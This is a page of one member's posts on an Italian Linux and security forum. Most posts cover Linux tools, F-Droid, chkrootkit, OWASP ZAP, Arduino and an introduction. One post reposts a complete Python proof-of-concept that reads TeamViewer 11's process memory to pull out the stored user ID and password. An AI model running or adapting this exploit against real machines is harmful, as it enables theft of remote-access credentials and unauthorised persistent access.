Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Topics - davenull

Pages: 1 2 3 [4]
46
lo script è interessante e pericoloso, ecco perchè da poco è uscita la versione 12 di TeamViewer.
Poteva degnarsi di scrivere il path dell'interprete python per winzozz!!!
Volendo lo si può anche adattare per GNU-Linux, anche se nel nostro caso TeamViewer è virtualizzato sotto wine... Bisognerebbe installare l'interprete python dentro wine, in modo da non avere problemi con le interazioni con il dbus.

Code: You are not allowed to view links. Register or Login
#####
# TeamViewer 11.0.65452 (64 bit) Local Credentials Disclosure
# Tested on Windows 7 64bit, English
# Vendor Homepage @ https://www.teamviewer.com/
# Date 07/09/2016
# Bug Discovered by Alexander Korznikov (https://www.linkedin.com/in/nopernik)
#
# http://www.korznikov.com | @nopernik
#
# Special Thanks to:
#       Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/)
#       Yakir Wizman (https://www.exploit-db.com/author/?a=1002) | (http://www.black-rose.ml)
#
#####
# TeamViewer 11.0.65452 is vulnerable to local credentials disclosure, the supplied userid and password are stored in a plaintext format in memory process.
# There is no need in privilege account access. Credentials are stored in context of regular user.
# A potential attacker could reveal the supplied username and password automaticaly and gain persistent access to host via TeamViewer services.
#
# Proof-Of-Concept Code:
#####

from winappdbg import Debug, Process, HexDump
import sys
import re

filename = 'TeamViewer.exe'

def memory_search( pid ):
        found = []
        # Instance a Process object.
        process = Process( pid )
        # Search for the string in the process memory.

        # Looking for User ID:
        userid_pattern = '([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]'
        for address in process.search_regexp( userid_pattern ):
                 found += [address]
       
        print 'Possible UserIDs found:'
        found = [i[-1] for i in found]
        for i in set(found):
           print i.replace('\x00','')
       
        found = []
        # Looking for Password:
        pass_pattern = '([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00'
        for address in process.search_regexp( pass_pattern ):
                 found += [process.read(address[0]-3,16)]
        if found:
            print '\nPassword:'
        if len(found) > 1:
            s = list(set([x for x in found if found.count(x) > 1]))
            for i in s:
               pwd = re.findall('[0-9]{4}',i.replace('\x00',''))[0]
            print pwd
        else:
            print re.findall('[0-9]{4}',found[0].replace('\x00',''))[0]
       
        return found

debug = Debug()
try:
        # Lookup the currently running processes.
        debug.system.scan_processes()
        # For all processes that match the requested filename...
        for ( process, name ) in debug.system.find_processes_by_filename( filename ):
                pid = process.get_pid()

        memory_search(pid)
           
finally:
        debug.stop()

You are not allowed to view links. Register or Login

47
Arduino / circuits.io – Simulatore di Arduino online
« on: December 19, 2016, 11:25:39 PM »
Ho trovato online questo bellissimo sito della Autodesk che ti permette di creare circuiti con Arduino, Breadboard e varie shield. Sono presenti anche numerosi lezioni di elettronica. E’ stupendo!!! Il tutto senza comprare l’Arduino.
Certo dopo aver provato questo sito ti vien voglia di comprare almeno l’Arduino Uno con lo Starter Kit, in modo da poter mettere in pratica dal vivo le lezioni studiate.
Mi complimento con il creatore del progetto. Molto, molto originale.
Ecco l’URL del progetto: You are not allowed to view links. Register or Login

48
GNU-Linux / Halloween Documents
« on: November 19, 2016, 12:09:27 AM »
Nel 1998 nel periodo di Halloween sono trapelati dei documenti (dichiarati autentici dalla microsoft) dove la microsoft stessa segnalava le proprie debolezze ed i punti di forza di GNU-Linux.
Negli stessi documenti si parlava delle loro pratiche scorrette ad esempio il noto "abbraccia estendi estingui":
abbraccia: prendi una tecnologia preesistente;
estendi: aggiungi delle funzionalità, magari inutili;
estingui: imponi la nuova tecnologia creata screditando quella di partenza.

questi documenti sono stati utilizzati in tribunale contro la microsoft per via di svariate pratiche di marketing scorrette. eric raymond ha tradotto e commentato questi documenti spiegandone il significato nei minimi dettagli. ecco la pagina di wikipedia che ne parla: You are not allowed to view links. Register or Login

49
Questo è il sito di cui vi parlavo al Linux Day 2016:

You are not allowed to view links. Register or Login

offre una collezione di programmi liberi e controllati (lato security) alternativi a quelli proprietari, tutti catalogati per categoria :)

50
Sicuramente vi starete chiedendo perchè ho chiamato questa sezione in questo modo.
Non tutti voi sanno che "tar" è un archiviatore e non un compressore, serve solo ed esclusivamente a mantenere i permessi sui files. Infatti quando vedete un file chiamato nomefile.tar.gz vuol dire che è stato comprezzo con "gz" (Gnu Zip) ma è stato archiviato con "tar".
Un'altra nota è su 7-zip:
ha il miglior algoritmo di compressione al mondo, ma elimina i permessi sui files.

51
Android / [TOOL] Heimdall - Alternativa ad Odin sotto GNU-Linux
« on: November 15, 2016, 02:08:18 AM »
Heimdall è un programma nato per sostituire Odin, programma per flashare i telefoni Samsung che gira solo sotto Windows.

Heimdall è possibile utilizzarlo sia a riga di comando che con il frontend scritto in Qt.

Heimdall è stato testato con successo sui seguenti dispositivi:
GT-I9000
GT-I9100[T]
GT-I9300
GT-I9505
SGH-I727
SGH-I777
SGH-I927
SGH-I797

Ecco a voi il sito ufficiale: You are not allowed to view links. Register or Login
Qui il codice sorgente su GitHub: You are not allowed to view links. Register or Login

È disponibile anche nei repository di Debian e derivate, digitando:
Code: You are not allowed to view links. Register or Login
sudo apt-get install heimdall-flash heimdall-flash-frontend

52
Android / [TOOL] F-Droid
« on: November 14, 2016, 08:12:17 PM »
F-Droid è un market di solo software libero, un'ottima alternativa al market di google (che non ho).
Di ogni software è possibile scaricare il codice sorgente, è una manna dal cielo per i programmatori. L'apk lo potete scaricare direttamente dal sito ufficiale:

You are not allowed to view links. Register or Login

L'unica pecca (se così si può chiamare) è che molti programmi sono ancora in inglese. Per me non è un problema, non so per voi...

53
Sandbox / prova link
« on: November 14, 2016, 07:28:18 PM »
<a href="You are not allowed to view links. Register or Login">debian</a>

54
OS / [TOOL] chkrootkit
« on: November 14, 2016, 06:42:30 PM »
Questo programma è presente in tutte le distro, quindi su una distro Debian-Like possiamo installarlo con il comando:
Code: You are not allowed to view links. Register or Login
sudo apt-get install chkrootkit
serve a trovare le rootkit più conosciute nel vostro sistema operativo. Per utilizzarlo basta lanciarlo da root scrivendo:
Code: You are not allowed to view links. Register or Login
chkrootkit
se volete salvare l'output su un file (in questo caso lo chiamiamo proprio output.txt) scriviamo:
Code: You are not allowed to view links. Register or Login
chkrootkit > output.txt
questo è il sito ufficiale del progetto: You are not allowed to view links. Register or Login

Sui repository di Debian troviamo sempre una versione più vecchia del programma, quindi andiamo sulla pagina di download del sito ufficiale You are not allowed to view links. Register or Login
e scarichiamo il file "chkrootkit latest Source tarball" con il comando:
Code: You are not allowed to view links. Register or Login
wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
Adesso estraiamo l'archivio digitando:
Code: You are not allowed to view links. Register or Login
tar -xvzf chkrootkit.tar.gz
Nel momento in cui sto scrivendo l'ultima versione è la 0.51, quindi mi ritroverò una cartella chiamata chkrootkit-0.51 ed al suo interno c'è già il file compilato in C chiamato appunto chkrootkit, ed ovviamente va eseguito da root dato che scansiona le cartelle di sistema.

Vi consiglio di utilizzare sempre le ultime versioni di questi programmi perchè contengono le definizioni delle nuove rootkit in circolazione.

55
sono stati aggiunti i punti 9 e 10 nel regolamento. per fare un pò di ordine nel forum :)

56
Web Application / [TOOL] OWASP Zed Attack Proxy Project
« on: November 14, 2016, 05:37:12 PM »
OWASP Zed Attack Proxy Project è un programma che cerca vulnerabilità nelle web application sfruttando principalmente la tecnica del fuzzing (lanciare a caso molte richieste).
È molto simile ad acunetix (tool commerciale e pesantissimo) ed è sviluppato in java.

You are not allowed to view links. Register or Login

57
Linux Mint Debian Edition (LMDE) / Mi ricredo in positivo su LMDE
« on: November 10, 2016, 03:52:15 AM »
Come dice il titolo, mi ricredo in positivo su Linux Mint Debian Edition (solo sulla Debian Edition, non quella basata su Ubuntu). Prima ai clienti desktop proponevo pointlinux You are not allowed to view links. Register or Login , una distro tedesca basata su Debian Stable con Mate e piccole altre personalizzazioni, però non ha un vero gestore dei pacchetti grafico oltre al vecchio e non intuitivo Synaptic. Invece LMDE sembra che ha già un gestore software Ubuntu-Like e sarà la distro che proporrò ai clienti, ovviamente sempre con MATE come ambiente desktop. Devo ringraziare l'utente "g" per avermelo fatto notare.
Un'altra nota positiva di LMDE è che ha già i repository di deb-multimedia, ma senza i backports.
E' ottima per un utente Desktop alle prime armi.

58
Introduce yourself - Presentazioni / echo "ciao" > /dev/null
« on: November 07, 2016, 09:42:20 PM »
sono Mirko, ho 27 anni, vengo da Taranto e sono uno degli Admin del forum.
Sono un sistemista Unix. Tratto principalmente Debian ed OpenWrt. Adoro la prototipazione con il Raspberry Pi e, che dire... Mi conoscerete meglio nel forum  8)

Pages: 1 2 3 [4]